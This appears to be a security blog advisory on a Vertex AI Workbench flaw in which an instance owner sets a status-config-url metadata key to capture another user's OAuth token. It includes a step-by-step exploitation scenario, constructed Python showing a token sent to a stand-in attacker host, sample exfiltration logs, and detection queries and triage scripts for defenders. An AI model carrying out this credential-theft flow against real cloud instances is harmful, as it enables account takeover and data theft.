CVE-2026-2244: Google Vertex AI Workbench Flaw Enables Cross-Tenant Account Takeover via OAuth Token Theft

Google Cloud Vertex AI Workbench – Privilege Escalation via Credential Exposure

CVE ID: CVE-2026-2244
Product: Google Cloud Vertex AI Workbench
Vulnerability Type: Improper Access Control / Credential Exposure
Impact: Cross-tenant privilege escalation and account takeover
CVSS Score: 8.4 (High)
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: Required
Exploit Availability: Publicly disclosed proof-of-concept (for research/educational purposes)
Affected Versions: Workbench instances created between July 21, 2025 and January 30, 2026
Fixed Version: Instances created or updated after January 30, 2026

Official Patch / Release Notes: Link provided below


Technical Description

CVE-2026-2244 affects Google Cloud Vertex AI Workbench instances configured in Single User mode with managed End User Credentials (EUC).

In this configuration, when a user clicks “Open JupyterLab,” their OAuth access token is temporarily injected into the virtual machine’s metadata so the notebook can act on behalf of that user.

The issue arises from insufficient restrictions around instance metadata keys and a built-in startup script (runtime-config-post-result) that executes during specific lifecycle events such as upgrades. Instance metadata is writable by whoever can create or modify the instance, which in the Single User scenario is not the user whose token is injected. A metadata attribute named status-config-url could be set to an arbitrary external endpoint, and when the startup script executed it sent a status request to the URL defined in metadata.

Under vulnerable conditions, this request could include authentication material associated with the user session. If that URL pointed to an attacker-controlled server, the victim's OAuth token could be captured.

Once obtained, that token could be used to perform API calls against Google Cloud services with the same permissions as the victim.

The vulnerability effectively allowed:

  • Cross-tenant credential theft
  • Privilege escalation
  • Unauthorized access to cloud resources
  • Potential lateral movement within GCP

Root Cause

The vulnerability was caused by a combination of:

  1. Overly permissive handling of custom metadata attributes.
  2. Lack of validation on the status-config-url metadata field.
  3. A startup script capable of transmitting status information externally.
  4. Injection of end-user OAuth tokens into instance metadata.
  5. Re-execution of startup scripts during instance upgrade events.

The core issue was improper access control over sensitive runtime behavior: owner-controlled metadata was consumed as trusted configuration by a privileged script that also had access to another principal's credential, so two trust domains (the instance owner's and the Single User's) met without any check between them.
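To make the root cause concrete, the following is an added Python illustration (constructed for this page; it is not Google's runtime-config-post-result script, whose source is not reproduced here) of the reporting pattern the list above describes, beside a hardened form. The key name euc-token, the allowlist host status.internal.example and the function names are assumptions.

```python
"""Constructed illustration of the reporting pattern behind the root cause.

This is NOT Google's runtime-config-post-result script; it models the
behaviour the advisory describes (a script trusts status-config-url from
instance metadata and sends a report carrying the user's token) next to a
hardened version. Key names other than status-config-url are assumptions.
"""
import ipaddress
from urllib.parse import urlsplit

# Metadata as an instance owner could have set it (constructed; "euc-token"
# is a stand-in for wherever the injected user token actually lived).
ATTACKER_METADATA = {
    "status-config-url": "https://attacker-controlled-server.example/status",
    "euc-token": "ya29.dummy-end-user-token",
}

# Hypothetical allowlist of hosts a status report may legitimately go to.
ALLOWED_STATUS_HOSTS = frozenset({"status.internal.example"})


def build_status_request_vulnerable(metadata):
    """Vulnerable pattern: the URL is owner-controlled data treated as trusted
    configuration, and the end-user token is attached to the request."""
    url = metadata["status-config-url"]
    headers = {"Authorization": "Bearer " + metadata["euc-token"]}
    return url, headers


def build_status_request_hardened(metadata, allowed_hosts=ALLOWED_STATUS_HOSTS):
    """Hardened pattern: validate the URL strictly and never attach a
    credential belonging to a principal other than the instance itself."""
    url = metadata.get("status-config-url", "")
    parts = urlsplit(url)
    if parts.scheme != "https":
        raise ValueError("status-config-url must be an https URL")
    # https://status.internal.example@attacker.example/ parses with the
    # allowed name as userinfo and the attacker as host; reject userinfo.
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo in status-config-url is not allowed")
    host = (parts.hostname or "").rstrip(".")
    try:
        ipaddress.ip_address(host)
        is_ip_literal = True
    except ValueError:
        is_ip_literal = False
    if is_ip_literal:
        raise ValueError("IP-literal hosts are not allowed")
    if host not in allowed_hosts:
        raise ValueError("host %r is not on the status allowlist" % host)
    # No Authorization header: the end-user token never leaves the instance.
    # If the receiver must authenticate the sender, use the VM's own identity.
    return url, {}


def hardened_rejects(metadata):
    """True if the hardened builder refuses this metadata."""
    try:
        build_status_request_hardened(metadata)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", build_status_request_vulnerable(ATTACKER_METADATA))
    print("hardened rejects attacker URL:", hardened_rejects(ATTACKER_METADATA))
```

The hardened form fixes two independent faults: it validates the destination (scheme, no userinfo, no IP literal, explicit allowlist; a URL such as https://status.internal.example@attacker.example/ passes a naive substring check but fails here), and it stops attaching a credential that belongs to a different principal than the one who controls the metadata. Either change alone would have blocked the token theft; both together also remove the ability to aim the script at arbitrary endpoints.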


Exploitation Scenario (Educational)

The exploitation flow typically involved:

  1. A malicious user creating a Vertex AI Workbench instance.
  2. Enabling Single User mode and specifying the target victim’s email.
  3. Setting a metadata key: status-config-url = https://attacker-controlled-server.com
  4. Convincing the victim to click “Open JupyterLab.”
  5. Triggering an instance upgrade or lifecycle event.
  6. The startup script executing and sending a request to the attacker’s server.
  7. The attacker capturing the OAuth token from HTTP request headers.

With the stolen token, the attacker could:

  • Access GCP APIs as the victim.
  • Read or modify storage buckets.
  • Deploy resources.
  • Access AI models or datasets.
  • Escalate further depending on IAM permissions.

No sophisticated exploit tooling was required. The attack relied on cloud configuration abuse rather than memory corruption or binary exploitation.


Impact Assessment

If exploited successfully:

  • Full API access within victim’s permission scope.
  • Data exfiltration from GCS buckets.
  • Unauthorized VM creation or modification.
  • Service account abuse.
  • Cross-project and potentially cross-organization impact.
  • Temporary account takeover until token expiration or revocation.

Because OAuth tokens were involved, the impact depended on token scope and lifetime. What leaked was an access token rather than a refresh token, so each capture gave the attacker a bounded window, but the trigger could be repeated for as long as the victim kept using the instance.


MITRE ATT&CK Mapping

  • T1552.005 – Unsecured Credentials: Cloud Instance Metadata API (the token was read from instance metadata)
  • T1078.004 – Valid Accounts: Cloud Accounts
  • T1041 – Exfiltration Over C2 Channel (the attacker's own endpoint receives the token; T1567, Exfiltration Over Web Service, covers third-party services instead)
  • T1537 – Transfer Data to Cloud Account

Related weakness: CWE-200 – Exposure of Sensitive Information to an Unauthorized Actor (a CWE entry, not an ATT&CK technique).

Indicators of Compromise (IOCs)

Investigations should focus on:

  • Presence of metadata key: status-config-url
  • Outbound HTTP requests from notebook instances to unknown domains
  • API calls performed using unusual IP addresses
  • Instances configured with Single User set to unexpected emails
  • Repeated instance upgrades shortly after JupyterLab access

Log Sources for Detection

The following log sources are critical:

  • Google Cloud Audit Logs (Admin Activity)
  • Data Access Logs
  • Compute Engine Metadata Change Logs
  • VPC Flow Logs
  • Cloud NAT Logs
  • Proxy / Egress Gateway Logs
  • OS-level logs from notebook VM instances

Detection Rules and Queries

1. Detect Suspicious Metadata Changes

Log Source: Cloud Audit Logs (Admin Activity)
Filter:

resource.type="gce_instance"
protoPayload.methodName=~"compute.instances.setMetadata$"
protoPayload.request.metadata.items.key="status-config-url"

Alert when this metadata key appears on any Vertex AI Workbench instance. Two gaps to close: metadata set at creation or update time through the Notebooks API (methodName ending in CreateInstance or UpdateInstance under google.cloud.notebooks) does not appear as a Compute Engine setMetadata call, so run a second filter over those methods and match the key inside protoPayload.request; and Compute Engine setMetadata entries also record the changed keys under protoPayload.metadata.instanceMetadataDelta (addedMetadataKeys / modifiedMetadataKeys), which is a more reliable match than the request body.


2. Detect Metadata Changes Combined with Single User Mode

resource.type="gce_instance"
protoPayload.methodName="v1.compute.instances.setMetadata"
protoPayload.request.metadata.items.key="status-config-url"
protoPayload.request.labels."notebooks.googleapis.com/user-email" != ""

This indicates targeting of a specific user. Confirm the label name against a known Single User instance in your own project before deploying the rule, and compare the labelled user with protoPayload.authenticationInfo.principalEmail: a status-config-url written by anyone other than the instance's designated user is the high-confidence signal.


3. Detect Outbound Token Exfiltration

Log Source: Proxy / Egress Gateway Logs (with TLS inspection)

Search for:

http.request.headers.authorization:"Bearer "
AND source.instance.name:"vertex"

or

jsonPayload.headers.authorization=~"Bearer .*"

Two caveats apply. First, the exfiltration request is HTTPS, so a proxy or firewall only sees the Authorization header if it terminates TLS; without inspection, fall back to destination-based signals (never-before-seen domains contacted by a notebook VM around a startup or upgrade event) from VPC Flow Logs or Cloud NAT logs. Second, notebook VMs legitimately send Bearer tokens to *.googleapis.com all day, so exclude that domain (and any other approved API endpoints) or the rule is pure noise. Any remaining external request carrying a Bearer token from a notebook instance should be treated as suspicious. The field names above follow the conventions of the inspecting product; adapt them to your schema.


4. Detect Unusual API Usage by Victim Identity

protoPayload.authenticationInfo.principalEmail="[email protected]"
NOT ip_in_net(protoPayload.requestMetadata.callerIp, "203.0.113.0/24")

Add one NOT ip_in_net(...) clause per expected corporate or VPN range (203.0.113.0/24 is a placeholder). This helps identify token abuse from attacker infrastructure; the stolen token carries the victim's identity, so the caller IP and user agent are often the only fields that distinguish the attacker's calls from the victim's own.
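Rules 3 and 4 as runnable logic, added here as an example and not part of the advisory's own tooling: a Python triage over constructed proxy-log lines and Cloud Audit Log entries. The proxy-log field names (src_instance, dst_host, authorization) are assumptions and presuppose a TLS-inspecting egress proxy; the audit-log field paths are the ones used in the rules above, and the IP ranges and sample addresses are documentation prefixes.

```python
"""Added example, not the advisory's tooling: rule 3 (bearer tokens leaving
notebook VMs) and rule 4 (a victim identity calling APIs from unexpected
addresses) over constructed log lines.

The proxy-log fields src_instance, dst_host and authorization are assumed
and presuppose a TLS-inspecting egress proxy; without inspection the
Authorization header of an HTTPS request is never visible. The audit-log
field paths are the real ones the rules above use.
"""
import ipaddress
import json

# Where a Google OAuth bearer token legitimately goes from a notebook.
GOOGLE_API_DOMAIN = "googleapis.com"
# Constructed "expected corporate" ranges (documentation prefixes).
EXPECTED_RANGES = [ipaddress.ip_network("203.0.113.0/24"),
                   ipaddress.ip_network("198.51.100.0/24")]


def token_host_allowed(host):
    host = host.lower().rstrip(".")
    return host == GOOGLE_API_DOMAIN or host.endswith("." + GOOGLE_API_DOMAIN)


def find_token_exfil(proxy_log):
    """Rule 3: bearer tokens sent anywhere other than Google APIs."""
    hits = []
    for line in proxy_log.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        auth = rec.get("authorization") or ""
        if not auth.startswith("Bearer "):
            continue
        host = rec.get("dst_host", "")
        if token_host_allowed(host):
            continue
        token = auth[len("Bearer "):]
        hits.append({
            "src": rec.get("src_instance"),
            "dst_host": host,
            # Google user access tokens start with "ya29."; anything else
            # (e.g. a JWT) is more likely an application's own credential.
            "google_token": token.startswith("ya29."),
        })
    return hits


def find_offnet_calls(audit_log, principal, ranges=EXPECTED_RANGES):
    """Rule 4: calls by `principal` whose callerIp is outside `ranges`.
    Unparseable callerIp values are surfaced rather than silently skipped."""
    hits = []
    for line in audit_log.splitlines():
        if not line.strip():
            continue
        pp = json.loads(line).get("protoPayload", {})
        if pp.get("authenticationInfo", {}).get("principalEmail") != principal:
            continue
        caller = pp.get("requestMetadata", {}).get("callerIp", "")
        try:
            addr = ipaddress.ip_address(caller)
        except ValueError:
            hits.append((pp.get("methodName"), caller, "unparseable callerIp"))
            continue
        if not any(addr in net for net in ranges):
            hits.append((pp.get("methodName"), caller, "outside expected ranges"))
    return hits


# Constructed sample lines (dummy tokens, documentation addresses).
PROXY_LOG = """\
{"src_instance": "nb-shared-01", "dst_host": "storage.googleapis.com", "authorization": "Bearer ya29.dummy-legit"}
{"src_instance": "nb-shared-01", "dst_host": "attacker-controlled-server.example", "authorization": "Bearer ya29.dummy-stolen"}
{"src_instance": "nb-team-02", "dst_host": "pypi.org"}
{"src_instance": "nb-team-02", "dst_host": "api.partner.example", "authorization": "Bearer eyJhbGciOiJSUzI1NiJ9.dummy"}
"""

AUDIT_LOG = """\
{"protoPayload": {"methodName": "storage.objects.get", "authenticationInfo": {"principalEmail": "victim@example.com"}, "requestMetadata": {"callerIp": "203.0.113.10"}}}
{"protoPayload": {"methodName": "storage.objects.list", "authenticationInfo": {"principalEmail": "victim@example.com"}, "requestMetadata": {"callerIp": "192.0.2.44"}}}
{"protoPayload": {"methodName": "v1.compute.instances.insert", "authenticationInfo": {"principalEmail": "victim@example.com"}, "requestMetadata": {"callerIp": "2001:db8::1"}}}
{"protoPayload": {"methodName": "storage.objects.get", "authenticationInfo": {"principalEmail": "other@example.com"}, "requestMetadata": {"callerIp": "192.0.2.44"}}}
"""

if __name__ == "__main__":
    print(find_token_exfil(PROXY_LOG))
    print(find_offnet_calls(AUDIT_LOG, "victim@example.com"))
```

The allowlist check is suffix-based on a dot boundary so that googleapis.com.attacker.example is not accepted, and the IPv6 caller is handled by the same ipaddress logic as IPv4 (an IPv6 address is simply never contained in an IPv4 network).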


5. Detect Instance Upgrade Trigger Abuse

Workbench upgrades are requested through the Notebooks API, not as a Compute Engine instance update, and no "upgrade" network tag is set in the process, so a filter on v1.compute.instances.update with protoPayload.request.tags.items:"upgrade" does not fire. Filter on the Notebooks upgrade method instead (confirm the exact methodName string in your own logs):

protoPayload.methodName=~"notebooks.*UpgradeInstance$"

Correlate this with metadata modifications on the same instance within a short timeframe, and treat an upgrade issued by an identity other than the instance's Single User as the higher-severity case.
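The following added example (Python, not the advisory's or Google's tooling) runs rules 1, 2 and 5 in one pass over constructed Cloud Audit Log entries; the same pass over an exported log window is the retrospective sweep that step 3 of the forensic section below calls for. It finds status-config-url whether it arrives as a Compute Engine setMetadata call (metadata.items list) or inside a Notebooks API create or update request, extracts the Single User identity, and marks any upgrade of the same instance within a window after the write. The Notebooks method-name suffixes, the gceSetup.metadata map shape, and the Single User key names proxy-user-mail and notebooks.googleapis.com/user-email are assumptions to confirm against real entries.

```python
"""Added example, not the advisory's tooling: rules 1, 2 and 5 in one pass
over constructed Cloud Audit Log entries. Notebooks method names, the
gceSetup.metadata shape and the Single User key names are assumptions."""
import json
from datetime import datetime, timedelta

FLAGGED_KEY = "status-config-url"
# Candidate names under which the Single User identity may appear (assumed).
SINGLE_USER_KEYS = ("proxy-user-mail", "notebooks.googleapis.com/user-email")


def walk(obj):
    """Yield every (key, value) pair at any depth of a decoded JSON value."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield key, value
            yield from walk(value)
    elif isinstance(obj, list):
        for item in obj:
            yield from walk(item)


def find_values(obj, key):
    """Values stored under `key`, in both map form ({key: value}) and
    Compute's list form (items: [{"key": key, "value": value}])."""
    found = [value for k, value in walk(obj) if k == key]
    for k, value in walk(obj):
        if k == "items" and isinstance(value, list):
            found += [item.get("value") for item in value
                      if isinstance(item, dict) and item.get("key") == key]
    return found


def parse_ts(ts):
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def triage(log_text, window=timedelta(hours=24)):
    """One record per flagged metadata write, in log order."""
    entries = [json.loads(line) for line in log_text.splitlines() if line.strip()]
    upgrades, flagged = [], []
    for entry in entries:
        pp = entry["protoPayload"]
        method = pp.get("methodName", "")
        when = parse_ts(entry["timestamp"])
        # Compute names the instance under zones/, Notebooks under locations/;
        # key on the short instance name so the two APIs correlate.
        instance = pp.get("resourceName", "").rsplit("/", 1)[-1]
        if method.endswith("UpgradeInstance"):          # Notebooks API upgrade
            upgrades.append((instance, when))
            continue
        if not method.endswith(("setMetadata", "CreateInstance", "UpdateInstance")):
            continue
        request = pp.get("request", {})
        urls = [u for u in find_values(request, FLAGGED_KEY) if u]
        if not urls:
            continue
        users = [u for key in SINGLE_USER_KEYS for u in find_values(request, key) if u]
        flagged.append({
            "time": when,
            "instance": instance,
            "actor": pp.get("authenticationInfo", {}).get("principalEmail"),
            "url": urls[0],
            "single_user": users[0] if users else None,
            "upgrade_within_window": False,
        })
    for rec in flagged:                                 # rule 5 correlation
        rec["upgrade_within_window"] = any(
            inst == rec["instance"] and rec["time"] <= t <= rec["time"] + window
            for inst, t in upgrades)
    return flagged


# Constructed entries; only the fields the rules need are present.
_NB = "projects/p1/locations/us-central1/instances/"
_GCE = "projects/p1/zones/us-central1-a/instances/"
SAMPLE_AUDIT_LOG = "\n".join(json.dumps(e) for e in [
    {"timestamp": "2026-01-12T10:00:00Z", "protoPayload": {
        "methodName": "google.cloud.notebooks.v2.NotebookService.CreateInstance",
        "resourceName": _NB + "nb-shared-01",
        "authenticationInfo": {"principalEmail": "attacker@example.com"},
        "request": {"instance": {"gceSetup": {"metadata": {
            "status-config-url": "https://attacker-controlled-server.example/s",
            "proxy-user-mail": "victim@example.com"}}}}}},
    {"timestamp": "2026-01-12T10:05:00Z", "protoPayload": {
        "methodName": "v1.compute.instances.setMetadata",
        "resourceName": _GCE + "nb-team-02",
        "authenticationInfo": {"principalEmail": "ml-admin@example.com"},
        "request": {"metadata": {"items": [{"key": "enable-oslogin", "value": "TRUE"}]}}}},
    {"timestamp": "2026-01-12T11:30:00Z", "protoPayload": {
        "methodName": "google.cloud.notebooks.v2.NotebookService.UpgradeInstance",
        "resourceName": _NB + "nb-shared-01",
        "authenticationInfo": {"principalEmail": "attacker@example.com"}}},
    {"timestamp": "2026-01-13T09:00:00Z", "protoPayload": {
        "methodName": "v1.compute.instances.setMetadata",
        "resourceName": _GCE + "nb-team-02",
        "authenticationInfo": {"principalEmail": "ml-admin@example.com"},
        "request": {"metadata": {"items": [
            {"key": "status-config-url", "value": "https://203.0.113.5/x"}]}}}},
])

if __name__ == "__main__":
    for rec in triage(SAMPLE_AUDIT_LOG):
        print(rec)
```

The recursive key search is deliberate: the same attribute can sit at protoPayload.request.metadata.items[].key for Compute Engine and deep inside the instance body for the Notebooks API, and a rule pinned to one path misses the other. The first record in the sample output is the full attack shape (a Single User set to someone other than the actor, an attacker-controlled URL, and an upgrade ninety minutes later); the second is a bare metadata write with no upgrade, which still warrants a look but is lower severity.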


Forensic Investigation Steps

  1. Identify all Workbench instances created between July 21, 2025 and January 30, 2026, including instances that have since been deleted (use Admin Activity audit logs, not only the current inventory).
  2. Extract metadata configuration history.
  3. Search audit logs for status-config-url.
  4. Review outbound HTTP logs during instance startup and upgrade events.
  5. For users who opened JupyterLab on a vulnerable instance, revoke active sessions and OAuth grants and require re-authentication (an access token cannot be rotated; it has to be invalidated).
  6. Review IAM changes performed during the suspected compromise window.

Remediation

Google addressed the issue by:

  • Removing or restricting the vulnerable startup script behavior.
  • Preventing untrusted metadata fields from being abused.
  • Blocking unsafe configurations in the control plane.

All affected instances should be upgraded or recreated using patched images.

Official Patch / Upgrade Link:
https://docs.cloud.google.com/vertex-ai/docs/workbench/release-notes#February_20_2026


Mitigation Recommendations

Until patch verification is completed:

  • Restrict permissions to create or modify Workbench instances.
  • Disable Single User mode where not required.
  • Enforce egress filtering on notebook VMs.
  • Block outbound traffic to unknown domains.
  • Monitor metadata write operations in real time.
  • Implement least privilege IAM policies.
  • Enable VPC Service Controls where applicable.

Security Hardening Recommendations

  • Enforce metadata allowlists.
  • Require approval workflows for notebook instance creation.
  • Centralize outbound HTTP inspection.
  • Monitor OAuth token usage anomalies.
  • Shorten Google Cloud session length for users (Google Cloud session control in the Google Workspace Admin console) where feasible; an IAM policy does not control the lifetime of an end-user OAuth access token.
  • Deploy Cloud IDS for anomaly detection.

Risk Evaluation

This vulnerability does not require complex exploitation techniques. It leverages trust assumptions in cloud orchestration components. Because exploitation depends on convincing a victim to access a notebook instance, the attack surface includes social engineering.

Organizations with multi-tenant GCP environments or shared AI infrastructure face elevated risk.

Immediate validation of patch status and retrospective log analysis are strongly recommended.


Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.